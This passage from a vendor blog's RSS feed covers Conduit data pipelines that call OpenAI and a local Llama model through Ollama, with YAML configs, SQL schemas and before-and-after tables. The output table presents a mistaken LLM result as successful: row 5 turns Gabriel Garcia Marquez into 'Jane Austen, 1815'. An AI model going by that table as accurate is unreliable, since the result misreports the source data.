  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; ai&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;summarizer
    &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;openai.textgen&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;api_key&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; $&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;OPENAI_API_KEY&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;model&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;gpt-4&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;field&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;.Payload.After.summary&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;prompt&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Summarize this support ticket in 2-3 sentences&quot;&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;# Generate embeddings for vector search&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; embeddings
    &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;openai.embeddings&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;api_key&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; $&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;OPENAI_API_KEY&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;model&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;text-embedding-3-small&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;field&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;.Payload.After.embedding&quot;&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;# Format for Slack notification&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; slack&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;formatter
    &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;field.set&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;field&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;.Payload.After.slack_message&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;*New Ticket #{{.Payload.After.ticket_id}}*\\n{{.Payload.After.summary}}\\nPriority: {{.Payload.After.priority}}&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Built-in Reliability and Scaling&lt;/h3&gt;
&lt;p&gt;Conduit handles the operational complexity that typically derails AI pipeline projects:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Automatic Error Handling&lt;/strong&gt;: Failed records are automatically retried with exponential backoff. Persistent failures are routed to dead letter queues for investigation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Backpressure Management&lt;/strong&gt;: When downstream services (like AI APIs) become slow or unavailable, Conduit automatically slows down processing to prevent system overload.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Messages are delivered in order&lt;/strong&gt;: It is guaranteed that messages from a single source connector will flow through the Conduit pipeline in the same order that was produced by that source.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Horizontal Scaling&lt;/strong&gt;: As your data volume grows, you can scale Conduit horizontally across multiple machines without changing your pipeline configuration.&lt;/p&gt;
&lt;h2&gt;The Broader Impact: AI That Keeps Up With Reality&lt;/h2&gt;
&lt;p&gt;Real-time AI workflows enabled by tools like Conduit represent more than just technical improvements—they enable fundamentally different approaches to business problems.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Proactive Instead of Reactive&lt;/strong&gt;: When AI systems can respond to events as they happen, they shift from reactive tools that analyze what happened to proactive systems that influence what happens next.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Compound Intelligence&lt;/strong&gt;: Real-time AI systems can build on their own outputs, creating feedback loops that improve performance over time. A customer service AI that learns from each interaction can provide better responses throughout the day, not just in the next batch cycle.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Human-AI Collaboration&lt;/strong&gt;: Real-time systems enable natural collaboration between humans and AI. Instead of humans waiting for batch reports, they can work alongside AI systems that provide insights and assistance in real-time.&lt;/p&gt;
&lt;h2&gt;Batch is the Past&lt;/h2&gt;
&lt;p&gt;The organizations that thrive in the AI-powered future will be those that can respond to opportunities and challenges as they emerge, not those that analyze them after the fact. Real-time data streaming isn&apos;t just a technical architecture choice—it&apos;s a strategic advantage.&lt;/p&gt;
&lt;p&gt;Tools like Conduit make real-time AI workflows accessible to any organization, regardless of their current technical infrastructure or data engineering expertise. The question isn&apos;t whether you&apos;ll eventually need real-time AI capabilities—it&apos;s whether you&apos;ll build them before or after your competitors do.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ready to build your first real-time AI pipeline?&lt;/strong&gt; &lt;a href=&quot;https://github.com/ConduitIO/conduit-ai-pipelines&quot;&gt;Check out our examples&lt;/a&gt; or &lt;a href=&quot;https://conduit.io/docs/getting-started&quot;&gt;get started with Conduit&lt;/a&gt; today.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;em&gt;What real-time AI use cases are you most excited about? Share your thoughts and questions in the comments below, or &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;join our Discord community&lt;/a&gt; to continue the conversation.&lt;/em&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Skip the Cloud, Keep the Power: Real-Time AI with Conduit and Llama]]></title><description><![CDATA[Conduit 0.13.5 has introduced a new builtin processor, the Ollama processor. This processor provides the capability to enhance data in their conduit pipelines by sending a prompt to a specified large language model(LLM).]]></description><link>https://meroxa.com/blog/skip-the-cloud-keep-the-power-real-time-ai-with-conduit-and-llama</link><guid isPermaLink="false">https://meroxa.com/blog/skip-the-cloud-keep-the-power-real-time-ai-with-conduit-and-llama</guid><dc:creator><![CDATA[Sarah Sicard]]></dc:creator><pubDate>Wed, 04 Jun 2025 11:00:00 GMT</pubDate><content:encoded>&lt;p&gt;The latest Conduit release, &lt;a href=&quot;https://conduit.io/changelog/2025-05-20-conduit-0-13-5-release&quot;&gt;v0.13.5&lt;/a&gt;, has introduced a new builtin processor, the &lt;a href=&quot;https://conduit.io/docs/using/processors/builtin/ollama&quot;&gt;Ollama processor&lt;/a&gt;. This processor provides the capability to enhance data in Conduit pipelines by sending a prompt to a specified large language model(LLM). By sending prompts to a self-hosted model through Ollama, users can perform data transformation directly in their pipeline.&lt;/p&gt;
&lt;p&gt;In this post, we will explore what Ollama is and work through some examples of how the Ollama processor can be used for data processing within Conduit.&lt;/p&gt;
&lt;h2&gt;What is Ollama?&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://ollama.com/&quot;&gt;Ollama&lt;/a&gt; is a self-hosted tool that provides the ability to create a bridge between a machine and a LLM. The ability to self-host gives the advantages such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Data Privacy&lt;/strong&gt; - All data remains on the user’s machine rather than being routed through the LLM’s parent company.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Availability -&lt;/strong&gt; There is no dependence of the availability of the LLM’s parent company&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Ollama empowers developers with greater flexibility and autonomy, eliminating the need to depend on third-party services.&lt;/p&gt;
&lt;h2&gt;Examples&lt;/h2&gt;
&lt;p&gt;Let’s walk through a few examples of the capabilities of the Ollama processor within conduit pipelines.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Extrapolate missing data&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Imagine that I am a trying to get information on various books from my old database into a new database with a different table format. My original table follows a schema like the following:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;TABLE&lt;/span&gt; authors &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
	id &lt;span class=&quot;token keyword&quot;&gt;SERIAL&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;PRIMARY&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;KEY&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	name &lt;span class=&quot;token keyword&quot;&gt;VARCHAR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;255&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	age &lt;span class=&quot;token keyword&quot;&gt;INTEGER&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	books &lt;span class=&quot;token keyword&quot;&gt;VARCHAR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;255&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;However, my new table that I am looking to transfer my data to follows the schema below:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;TABLE&lt;/span&gt; author_info &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
	id &lt;span class=&quot;token keyword&quot;&gt;SERIAL&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;PRIMARY&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;KEY&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	first_name &lt;span class=&quot;token keyword&quot;&gt;VARCHAR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;255&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	last_name &lt;span class=&quot;token keyword&quot;&gt;VARCHAR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;255&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	year_of_birth &lt;span class=&quot;token keyword&quot;&gt;INTEGER&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	books &lt;span class=&quot;token keyword&quot;&gt;VARCHAR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;255&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In order to populate the new database, I will need to ask the LLM to separate the given name into a first and last name and perform a lookup of the year of birth.&lt;/p&gt;
&lt;p&gt;I created a sample conduit pipeline using the following configuration.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2.2&lt;/span&gt;

&lt;span class=&quot;token key atrule&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; ollama&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;author&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;pipeline
  &lt;span class=&quot;token key atrule&quot;&gt;status&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; running
  &lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;connector&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
      &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;postgres
      &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;tables&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;authors&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres://username:password@localhost:5433/client1?sslmode=disable&quot;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; dest&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;connector&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
      &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;postgres
      &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres://username:password@localhost:5433/client2?sslmode=disable&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;table&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;author_info&quot;&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; ollama&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;processor&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;ollama
      &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;http://127.0.0.1:11434&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;model&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;llama3.2&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;prompt&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token scalar string&quot;&gt;
          Take the given input, and put the information into a json of the following format:
            {&lt;/span&gt;
	            &lt;span class=&quot;token key atrule&quot;&gt;&quot;first_name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;something&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; 
	            &lt;span class=&quot;token key atrule&quot;&gt;&quot;last_name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;something&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; 
	            &lt;span class=&quot;token key atrule&quot;&gt;&quot;year_of_birth&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;something&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; 
	            &lt;span class=&quot;token key atrule&quot;&gt;&quot;books&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;something&quot;&lt;/span&gt;
	           &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
          The incoming name is a famous author&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; so if the author has three names&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; please determine whether the middle name should be part of thier first name or their last name. You can assume the name field in the input is formated \&quot;firstname lastname\&quot;.
          The year_of_birth field should be determined based off of the year the author was born. If that cannot be found&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; determine based on the current year minus the incoming age of the author.
          The books field will only contain one book&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; do not return a list.&quot;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;After running Conduit on this pipeline, all information from my original database is transferred, with the following result.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt; id &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;          name          &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; age &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;               books
&lt;span class=&quot;token comment&quot;&gt;----+------------------------+-----+-----------------------------------&lt;/span&gt;
  &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Charles Dickens        &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;  &lt;span class=&quot;token number&quot;&gt;58&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Oliver Twist
  &lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Jane Austin            &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;  &lt;span class=&quot;token number&quot;&gt;41&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Pride &lt;span class=&quot;token operator&quot;&gt;and&lt;/span&gt; Prejudice
  &lt;span class=&quot;token number&quot;&gt;3&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Charlotte Bronte       &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;  &lt;span class=&quot;token number&quot;&gt;38&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Jane Eyre
  &lt;span class=&quot;token number&quot;&gt;4&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Edgar Allan Poe        &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;  &lt;span class=&quot;token number&quot;&gt;40&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; The Raven
  &lt;span class=&quot;token number&quot;&gt;5&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Gabriel Garcia Marquez &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;  &lt;span class=&quot;token number&quot;&gt;80&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; One Hundred Years &lt;span class=&quot;token keyword&quot;&gt;of&lt;/span&gt; Solitude
  &lt;span class=&quot;token number&quot;&gt;6&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Sylvia Plath           &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;  &lt;span class=&quot;token number&quot;&gt;43&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; The Bell Jar
  &lt;span class=&quot;token number&quot;&gt;7&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Arthur Conan Doyle     &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;  &lt;span class=&quot;token number&quot;&gt;76&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; The Adventures &lt;span class=&quot;token keyword&quot;&gt;of&lt;/span&gt; Sherlock Holmes
  &lt;span class=&quot;token number&quot;&gt;8&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Ray Bradberry          &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;  &lt;span class=&quot;token number&quot;&gt;45&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Fahrenheit &lt;span class=&quot;token number&quot;&gt;451&lt;/span&gt;
  &lt;span class=&quot;token number&quot;&gt;9&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; L Frank Baum           &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;  &lt;span class=&quot;token number&quot;&gt;90&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Wizard &lt;span class=&quot;token keyword&quot;&gt;of&lt;/span&gt; Oz
 &lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Charles Darwin         &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;  &lt;span class=&quot;token number&quot;&gt;50&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Origin &lt;span class=&quot;token keyword&quot;&gt;of&lt;/span&gt; Species&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt; id &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; first_name &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;  last_name  &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; year_of_birth &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;               books
&lt;span class=&quot;token comment&quot;&gt;----+------------+-------------+---------------+-----------------------------------&lt;/span&gt;
  &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Charles    &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Dickens     &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;          &lt;span class=&quot;token number&quot;&gt;1812&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Oliver Twist
  &lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Jane       &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Austin      &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;          &lt;span class=&quot;token number&quot;&gt;1775&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Pride &lt;span class=&quot;token operator&quot;&gt;and&lt;/span&gt; Prejudice
  &lt;span class=&quot;token number&quot;&gt;3&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Charlotte  &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Bronté      &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;          &lt;span class=&quot;token number&quot;&gt;1816&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Jane Eyre
  &lt;span class=&quot;token number&quot;&gt;4&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Edgar      &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Allan Poe   &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;          &lt;span class=&quot;token number&quot;&gt;1809&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; The Raven
  &lt;span class=&quot;token number&quot;&gt;5&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Jane       &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Austen      &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;          &lt;span class=&quot;token number&quot;&gt;1815&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Pride &lt;span class=&quot;token operator&quot;&gt;and&lt;/span&gt; Prejudice
  &lt;span class=&quot;token number&quot;&gt;6&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Sylvia     &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Plath       &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;          &lt;span class=&quot;token number&quot;&gt;1932&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; The Bell Jar
